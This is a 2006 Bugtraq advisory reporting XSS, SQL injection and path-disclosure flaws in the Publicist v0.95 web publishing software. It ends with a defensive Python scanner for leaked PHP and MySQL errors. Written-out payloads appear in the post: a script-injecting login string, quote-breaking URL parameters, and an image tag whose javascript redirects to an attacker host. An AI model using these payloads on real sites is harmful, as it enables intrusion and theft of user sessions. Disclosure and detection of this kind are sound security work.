Message-ID: <20060523080110.24297.qmail@securityfocus.com>
Date: 23 May 2006 08:01:10 -0000
From: luny@...fucktard.com
To: bugtraq@...urityfocus.com
Subject: Publicist v0.95 - XSS And Full Path Errors


Publicist v0.95 

Homepage:
http://publicist.kau.se/ 

Description:
Publicist is a free web server software, created for web papers, that allows groups of people to write and publish together on the web (i.e. schools or single classes, clubs, or other groups who wish to express themselves). 

-------------------------------------- 

Exploits & Vulnerabilities: 

Full path and SQL Query errors: 

Type the following in login box: [BODY ONLOAD=alert('XSS')]
and it produces: 

1064: You have an error in your SQL syntax near 'XSS')>'' at line 1 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/html.example.com/left.php on line 63 

SQL injection on return variable: http://www.example.com/info.php?id=1147443203&return_=3' 

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/html.publicist.kau.se/count.php on line 6 Unable to process query: You have an error in your SQL syntax near ''/info.php?id=1147443203&return_=3'', count=1' at line 1 

SQL Injection on visa variable: 
http://www.example.com/hitlist_editorial_public_info.php?visa=dan.akerlund' 

Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /var/www/examplesite.com/hitlist_editorial_public_info.php on line 73 

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/examplesite.com/hitlist_editorial_public_info.php on line 74 



Submitting HTML tags in the comment boxes produces this SQL query error: 

1064: You have an error in your SQL syntax near 'evilcode'))>', c_show = '1', c_time = '1' at line 7 



XSS Vulnerability: 

An XSS attack is possible by entering in the comment box some html code like this: 

[IMG SRC=javascript:window.location('http://www.evilsite.com/evilcode.js')] 

It should also be noted that the files c_getMsg.php, c_getUser.php and count.php, when called, display full path errors and contain MySQL connect info: 

Example of the above errors: 

Warning: mysql_connect(): Access denied for user: 'example@...alhost' (Using password: YES) in /var/www/html.example.com/c_getUser.php on line 2 
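
A defender-side check for the error leakage this post describes, as an added example that is not part of the original post: it scans an HTTP response body for PHP warnings that reveal the server path, echoed MySQL syntax errors, and a leaked database account name. The function name, finding labels and sample bodies are constructed for illustration, modeled on the messages quoted above.

```python
import html
import re

# "Warning: func(): message in /path/file.php on line N" (PHP display_errors output)
PHP_WARNING = re.compile(
    r"(?P<level>Warning|Notice|Fatal error):\s+(?P<func>\w+)\(\)"
    r"(?:\s*\[[^\]]*\])?:\s+(?P<msg>.*?)"
    r"\s+in\s+(?P<path>/\S+?\.php)\s+on\s+line\s+(?P<line>\d+)"
)
# MySQL syntax error text echoed to the client (error 1064 in the post)
SQL_SYNTAX = re.compile(r"You have an error in your SQL syntax")
# Database account name leaked by a failed mysql_connect()
DB_USER = re.compile(r"Access denied for user:?\s+'(?P<user>[^']+)'")

# Constructed sample bodies, modeled on the messages quoted in the post.
SAMPLE_LOGIN = (
    "1064: You have an error in your SQL syntax near 'x' at line 1 "
    "Warning: mysql_fetch_array(): supplied argument is not a valid MySQL "
    "result resource in /var/www/html.example.com/left.php on line 63"
)
# The same kind of leak as PHP renders it with html_errors enabled.
SAMPLE_HTML = (
    "<b>Warning</b>:  mysql_connect() [<a href='function.mysql-connect'>"
    "function.mysql-connect</a>]: Access denied for user: 'dbuser@localhost' "
    "(Using password: YES) in <b>/var/www/html.example.com/c_getUser.php</b> "
    "on line <b>2</b><br />"
)
SAMPLE_CLEAN = "<html><body>Login failed.</body></html>"


def scan_response(body):
    """Return findings (list of dicts) for one HTTP response body."""
    # Strip markup and decode entities so HTML-formatted errors still match.
    text = html.unescape(re.sub(r"<[^>]+>", "", body))
    findings = []
    for m in PHP_WARNING.finditer(text):
        findings.append({"type": "full_path_disclosure",
                         "function": m.group("func"),
                         "path": m.group("path"),
                         "line": int(m.group("line"))})
    if SQL_SYNTAX.search(text):
        findings.append({"type": "sql_error_disclosure"})
    for m in DB_USER.finditer(text):
        findings.append({"type": "db_account_disclosure", "user": m.group("user")})
    return findings


if __name__ == "__main__":
    for name, body in [("login", SAMPLE_LOGIN), ("html", SAMPLE_HTML), ("clean", SAMPLE_CLEAN)]:
        print(name, scan_response(body))
```

Any finding here means PHP is rendering errors to the client; setting `display_errors` off and `log_errors` on in the PHP configuration keeps the same diagnostics in the server log instead.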

